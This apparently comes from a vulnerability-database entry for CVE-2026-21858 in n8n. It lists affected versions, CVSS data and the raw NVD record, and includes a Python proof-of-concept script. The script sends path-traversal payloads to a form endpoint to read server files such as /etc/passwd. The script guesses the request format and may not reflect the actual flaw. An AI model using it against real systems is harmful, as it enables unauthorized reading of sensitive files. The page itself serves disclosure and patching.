Security Vulnerability Report
CVE-2026-21858 CVSS 10.0 CRITICAL

CVE-2026-21858

Published: 2026-01-08 00:16:00
Last Modified: 2026-01-16 19:31:34

Description

n8n is an open source workflow automation platform. Versions starting with 1.65.0 and below 1.121.0 enable an attacker to access files on the underlying server through execution of certain form-based workflows. A vulnerable workflow could grant access to an unauthenticated remote attacker, resulting in exposure of sensitive information stored on the system and may enable further compromise depending on deployment configuration and workflow usage. This issue is fixed in version 1.121.0.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:* - VULNERABLE
n8n >= 1.65.0 and < 1.121.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-21858 PoC - n8n Sensitive Information Disclosure

This PoC demonstrates how to exploit the path traversal vulnerability in n8n
to read arbitrary files from the server filesystem.

Usage:
    python3 cve-2026-21858_poc.py --url http://target-n8n:5678 --workflow-id <id> --file /etc/passwd

Note: This is for educational and authorized testing purposes only.
"""

import argparse
import sys

import requests


def exploit_path_traversal(base_url, workflow_id, target_file):
    """
    Attempt to exploit the path traversal vulnerability in n8n forms.

    Args:
        base_url: Base URL of the n8n instance
        workflow_id: ID of a vulnerable form-based workflow
        target_file: Path to the file to read (e.g., /etc/passwd)
    """
    # Construct the form submission endpoint
    form_endpoint = f"{base_url.rstrip('/')}/form/{workflow_id}"

    # Common path traversal patterns
    traversal_patterns = [
        target_file,
        f"../../../../..{target_file}",
        f"..%2F..%2F..%2F..%2F{target_file.lstrip('/').replace('/', '%2F')}",
        f"....//....//....//....//{target_file.lstrip('/')}",
        # Backslashes must be escaped inside a Python string literal
        f"..\\..\\..\\..\\{target_file}",
    ]

    print(f"[*] Target: {form_endpoint}")
    print(f"[*] Attempting to read: {target_file}")
    print("-" * 60)

    for i, payload in enumerate(traversal_patterns, 1):
        print(f"\n[*] Attempt {i} with payload: {payload}")

        # Construct the form data
        # The exact structure depends on the specific vulnerable workflow
        form_data = {
            "data": {
                "filePath": payload,
                "operation": "read"
            }
        }

        try:
            response = requests.post(
                form_endpoint,
                json=form_data,
                headers={
                    "Content-Type": "application/json",
                    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
                },
                timeout=10,
                verify=False
            )
            print(f"[*] Status Code: {response.status_code}")

            if response.status_code == 200:
                try:
                    result = response.json()
                    # Only a JSON object can carry the expected keys
                    if isinstance(result, dict) and (result.get('success') or 'data' in result):
                        print("[+] VULNERABLE! File content retrieved:")
                        print("-" * 40)
                        print(result.get('data', result))
                        return True
                except ValueError:
                    # Body was not JSON (json.JSONDecodeError is a ValueError)
                    if len(response.text) > 0:
                        print("[+] Potential file content found:")
                        print(response.text[:500])
                        return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")

    print("\n[-] Exploitation attempts completed. Target may not be vulnerable.")
    return False


def main():
    parser = argparse.ArgumentParser(
        description='CVE-2026-21858 PoC - n8n Path Traversal'
    )
    parser.add_argument('--url', required=True, help='Base URL of n8n instance')
    parser.add_argument('--workflow-id', required=True, help='ID of form workflow')
    parser.add_argument('--file', default='/etc/passwd', help='File path to read')
    args = parser.parse_args()

    success = exploit_path_traversal(args.url, args.workflow_id, args.file)

    if success:
        print("\n[!] Target is vulnerable to CVE-2026-21858")
        print("[!] Recommended action: Upgrade to n8n >= 1.121.0")
        sys.exit(0)
    else:
        print("\n[-] Target does not appear to be vulnerable")
        sys.exit(1)


if __name__ == '__main__':
    main()

References

https://github.com/n8n-io/n8n/security/advisories/GHSA-v4pr-fm98-w9pg (Vendor Advisory)
https://www.cyera.com/research-labs/ni8mare-unauthenticated-remote-code-execution-in-n8n-cve-2026-21858 (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-21858",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-08T00:15:59.990",
    "lastModified": "2026-01-16T19:31:34.467",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "n8n is an open source workflow automation platform. Versions starting with 1.65.0 and below 1.121.0 enable an attacker to access files on the underlying server through execution of certain form-based workflows. A vulnerable workflow could grant access to an unauthenticated remote attacker, resulting in exposure of sensitive information stored on the system and may enable further compromise depending on deployment configuration and workflow usage. This issue is fixed in version 1.121.0."
      },
      {
        "lang": "es",
        "value": "n8n es una plataforma de automatización de flujos de trabajo de código abierto. Las versiones a partir de la 1.65.0 y anteriores a la 1.121.0 permiten a un atacante acceder a archivos en el servidor subyacente mediante la ejecución de ciertos flujos de trabajo basados en formularios. Un flujo de trabajo vulnerable podría conceder acceso a un atacante remoto no autenticado, lo que resultaría en la exposición de información sensible almacenada en el sistema y podría permitir un mayor compromiso dependiendo de la configuración de despliegue y el uso del flujo de trabajo. Este problema está solucionado en la versión 1.121.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
            "baseScore": 10.0,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.8
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-20"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:*",
                "versionStartIncluding": "1.65.0",
                "versionEndExcluding": "1.121.0",
                "matchCriteriaId": "A90AFDBB-31A3-41C0-8E53-8D10D9FB47C3"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-v4pr-fm98-w9pg",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://www.cyera.com/research-labs/ni8mare-unauthenticated-remote-code-execution-in-n8n-cve-2026-21858",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}